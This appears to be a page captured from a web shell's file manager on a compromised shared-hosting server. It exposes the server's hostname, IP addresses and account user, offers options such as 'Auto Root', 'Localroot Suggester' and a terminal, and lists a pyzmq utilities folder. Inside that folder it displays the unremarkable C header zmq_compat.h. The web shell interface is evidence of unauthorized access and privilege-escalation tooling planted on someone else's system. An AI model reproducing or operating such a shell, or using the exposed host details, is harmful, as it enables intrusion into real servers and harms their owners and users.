Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib64 /
python3.6 /
site-packages /
zmq /
utils /
Delete
Unzip
Name
Size
Permission
Date
Action
__pycache__
[ DIR ]
drwxr-xr-x
2022-03-29 05:07
__init__.py
0
B
-rw-r--r--
2018-02-10 08:02
buffers.pxd
9.63
KB
-rw-r--r--
2018-02-10 08:02
compiler.json
266
B
-rw-r--r--
2022-03-16 07:01
config.json
255
B
-rw-r--r--
2022-03-16 07:01
constant_names.py
7.73
KB
-rw-r--r--
2018-02-10 08:02
garbage.py
5.8
KB
-rw-r--r--
2018-02-10 08:02
getpid_compat.h
103
B
-rw-r--r--
2018-02-10 08:02
interop.py
709
B
-rw-r--r--
2018-02-10 08:02
ipcmaxlen.h
454
B
-rw-r--r--
2018-02-10 08:02
jsonapi.py
1.36
KB
-rw-r--r--
2018-02-10 08:02
monitor.py
2.04
KB
-rw-r--r--
2018-02-10 08:02
mutex.h
1.58
KB
-rw-r--r--
2018-02-10 08:02
pyversion_compat.h
1.29
KB
-rw-r--r--
2018-02-10 08:02
sixcerpt.py
1.84
KB
-rw-r--r--
2018-02-10 08:02
strtypes.py
1.17
KB
-rw-r--r--
2018-02-10 08:02
win32.py
5
KB
-rw-r--r--
2018-02-10 08:02
z85.py
1.95
KB
-rw-r--r--
2018-02-10 08:02
zmq_compat.h
2.88
KB
-rw-r--r--
2018-02-10 08:02
zmq_constants.h
13.66
KB
-rw-r--r--
2018-02-10 08:02
Save
Rename
//----------------------------------------------------------------------------- // Copyright (c) 2010 Brian Granger, Min Ragan-Kelley // // Distributed under the terms of the New BSD License. The full license is in // the file COPYING.BSD, distributed as part of this software. //----------------------------------------------------------------------------- #if defined(_MSC_VER) #define pyzmq_int64_t __int64 #define pyzmq_uint32_t unsigned __int32 #else #include <stdint.h> #define pyzmq_int64_t int64_t #define pyzmq_uint32_t uint32_t #endif #include "zmq.h" // version compatibility for constants: #include "zmq_constants.h" #define _missing (-1) // define fd type (from libzmq's fd.hpp) #ifdef _WIN32 #if defined(_MSC_VER) && _MSC_VER <= 1400 #define ZMQ_FD_T UINT_PTR #else #define ZMQ_FD_T SOCKET #endif #else #define ZMQ_FD_T int #endif // use unambiguous aliases for zmq_send/recv functions #if ZMQ_VERSION_MAJOR >= 4 // nothing to remove #if ZMQ_VERSION_MINOR == 0 // zmq 4.1 deprecates zmq_utils.h // we only get zmq_curve_keypair from it #include "zmq_utils.h" #endif #else #define zmq_curve_keypair(z85_public_key, z85_secret_key) _missing #endif // libzmq 4.2 draft API #ifdef ZMQ_BUILD_DRAFT_API #if ZMQ_VERSION_MAJOR >= 4 && ZMQ_VERSION_MINOR >= 2 #define PYZMQ_DRAFT_42 #endif #endif #ifndef PYZMQ_DRAFT_42 #define zmq_join(s, group) _missing #define zmq_leave(s, group) _missing #define zmq_msg_set_routing_id(msg, routing_id) _missing #define zmq_msg_routing_id(msg) 0 #define zmq_msg_set_group(msg, group) _missing #define zmq_msg_group(msg) NULL #endif #if ZMQ_VERSION_MAJOR >= 4 && ZMQ_VERSION_MINOR >= 1 // nothing to remove #else #define zmq_msg_gets(msg, prop) _missing #define zmq_has(capability) _missing #endif #if ZMQ_VERSION_MAJOR >= 3 #define zmq_sendbuf zmq_send #define zmq_recvbuf zmq_recv // 3.x deprecations - these symbols haven't been removed, // but let's protect against their planned removal #define zmq_device(device_type, isocket, osocket) _missing #define zmq_init(io_threads) ((void*)NULL) #define zmq_term zmq_ctx_destroy #else #define zmq_ctx_set(ctx, opt, val) _missing #define zmq_ctx_get(ctx, opt) _missing #define zmq_ctx_destroy zmq_term #define zmq_ctx_new() ((void*)NULL) #define zmq_proxy(a,b,c) _missing #define zmq_disconnect(s, addr) _missing #define zmq_unbind(s, addr) _missing #define zmq_msg_more(msg) _missing #define zmq_msg_get(msg, opt) _missing #define zmq_msg_set(msg, opt, val) _missing #define zmq_msg_send(msg, s, flags) zmq_send(s, msg, flags) #define zmq_msg_recv(msg, s, flags) zmq_recv(s, msg, flags) #define zmq_sendbuf(s, buf, len, flags) _missing #define zmq_recvbuf(s, buf, len, flags) _missing #define zmq_socket_monitor(s, addr, flags) _missing #endif